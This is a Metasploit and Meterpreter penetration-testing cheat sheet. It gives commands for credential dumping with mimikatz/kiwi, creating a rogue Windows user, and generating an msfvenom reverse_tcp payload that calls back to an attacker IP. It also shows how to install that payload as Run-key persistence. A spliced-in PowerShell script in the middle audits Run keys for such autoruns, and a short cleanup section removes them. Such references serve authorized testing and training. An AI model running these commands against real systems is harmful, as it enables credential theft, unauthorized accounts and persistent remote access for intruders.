Set up the database
service postgresql start
msfdb init
Test it:
msfconsole
db_status
You’ll know it worked if you see [*] postgresql connected to msf.
Resource: https://docs.kali.org/general-use/starting-metasploit-framework-in-kali
Troubleshooting database connectivity issues
Start by restarting the postgres service:
service postgresql restart
If that doesn’t work, try destroying and recreating the database:
msfdb delete
msfdb init
Then test it:
msfconsole
db_status
Resource: https://stackoverflow.com/questions/32561760/metasploit-cant-use-default-msf3-to-connect
Meterpreter
Get current user info
getuid
View running jobs
Useful if you’re running something with exploit -j -z
jobs
Upload file
You could use this in conjunction with an Empire payload for example
upload /tmp/launcher.bat C:\\Users\\target_user\\Downloads
Create a rogue user on a Windows system
run getgui -u <user to create> -p <password to set>
Resource: https://www.coengoedegebure.com/hacking-windows-with-meterpreter/#anchor_createanewaccount
Mimikatz
To get started, run:
load kiwi
Show commands
help
Dump all creds:
creds_all
Run mimikatz command examples
mimikatz_command -f sekurlsa::searchPasswords
mimikatz_command -f sekurlsa::logonPasswords
mimikatz_command -f samdump::hashes
Interact with harvested credentials
List credentials
creds
Delete all smb credentials
creds -d -p 445
Persistence
Generate a malicious exe (note that the payload you choose may be different):
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attackers ip> LPORT=4444 -f exe -o /tmp/evil.exe
Run this in meterpreter:
run post/windows/manage/persistence_exe REXEPATH=/tmp/evil.exe REXENAME=default.exe STARTUP=USER LocalExePath=C:\\tmp
or background meterpreter and use the post module:
use post/windows/manage/persistence_exe
set REXEPATH /tmp/evil.exe
set SESSION <session number>
set STARTUP USER
set LocalExePath C:\\tmp
run
STARTUP can be USER (the registry key is written under HKCU - HKEY_CURRENT_USER), SYSTEM (the registry key is written under HKLM - HKEY_LOCAL_MACHINE), or SERVICE (a rogue service is created), which doesn’t seem to work very well.
Cleanup
The cleanup rc file does not work very well. As a result, you should take note of the registry key and the associated file that are dropped so you can clean them up later, and make sure to note which user you’re running as. To remove the registry key (say STARTUP was set to USER and hFaZvOAsF is the value name), run the following command:
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v hFaZvOAsF /f
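Because the module’s cleanup script is unreliable, it helps to be able to audit the Run keys it writes to rather than relying on memory of the random value name. The following PowerShell is an added example, not part of the original cheat sheet or of Metasploit: it lists every entry under the HKCU and HKLM Run keys, resolves the executable each one launches, and flags entries whose binary lives outside Program Files or the Windows directory (for example the C:\tmp drop location used above). The trusted-root list and the quoting heuristic are assumptions for this example; reading HKLM requires an elevated prompt.

```powershell
# Added example (not from the cheat sheet): audit the Run keys that
# post/windows/manage/persistence_exe writes to (HKCU for STARTUP=USER,
# HKLM for STARTUP=SYSTEM) and flag autoruns launched from unusual paths.
# Assumption: run from an elevated PowerShell prompt so HKLM is readable.

$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
)

# Directories from which autoruns are normally expected (assumed list);
# anything launched from elsewhere (C:\tmp, a user profile, ...) is flagged.
$trustedRoots = @(
    $env:ProgramFiles,
    ${env:ProgramFiles(x86)},
    $env:SystemRoot
) | Where-Object { $_ }

function Get-RunKeyAudit {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            # Skip the metadata properties PowerShell adds (PSPath, PSParentPath, ...)
            if ($p.Name -like 'PS*') { continue }
            $value = [string]$p.Value

            # Recover the executable path: quoted path if present, otherwise the
            # first whitespace-delimited token (heuristic; unquoted paths with
            # spaces will be truncated and show up as non-existent).
            if ($value -match '^"([^"]+)"') {
                $exe = $Matches[1]
            } else {
                $exe = ($value -split '\s+')[0]
            }
            $exe = [Environment]::ExpandEnvironmentVariables($exe)

            $trusted = $false
            foreach ($root in $trustedRoots) {
                if ($exe.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) {
                    $trusted = $true
                }
            }

            [pscustomobject]@{
                Key        = $key
                ValueName  = $p.Name
                Command    = $value
                Executable = $exe
                Exists     = (Test-Path -LiteralPath $exe)
                Suspicious = (-not $trusted)
            }
        }
    }
}

# Show only the entries worth a second look.
Get-RunKeyAudit | Where-Object Suspicious | Format-Table -AutoSize

# Once an entry is confirmed as the dropped persistence value, removing it is the
# same operation as the reg delete command above, e.g.:
# Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'hFaZvOAsF'
```

The Exists column is useful during cleanup: after deleting the registry value, the file it pointed to (the copy placed under LocalExePath) still has to be removed by hand, and an entry whose binary no longer exists is a leftover from an earlier, incomplete cleanup.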
Run commands on local system
All you need to do is add an “l” before the command you want to run.
Current directory on system running msf
lpwd
Run ls
lls
Change directory
lcd <target dir>
Download remote file to current directory
download <filename>
The file will be in lpwd.
Channels
You can spawn a channel off of a session by hitting ctrl-z.
List
channel -l
Interact
channel -i <id>
Destroy
channel -k <id>
Edit remote file
edit /path/to/file
Start in quiet mode
msfconsole -q
Resource: https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
Show advanced module options
show advanced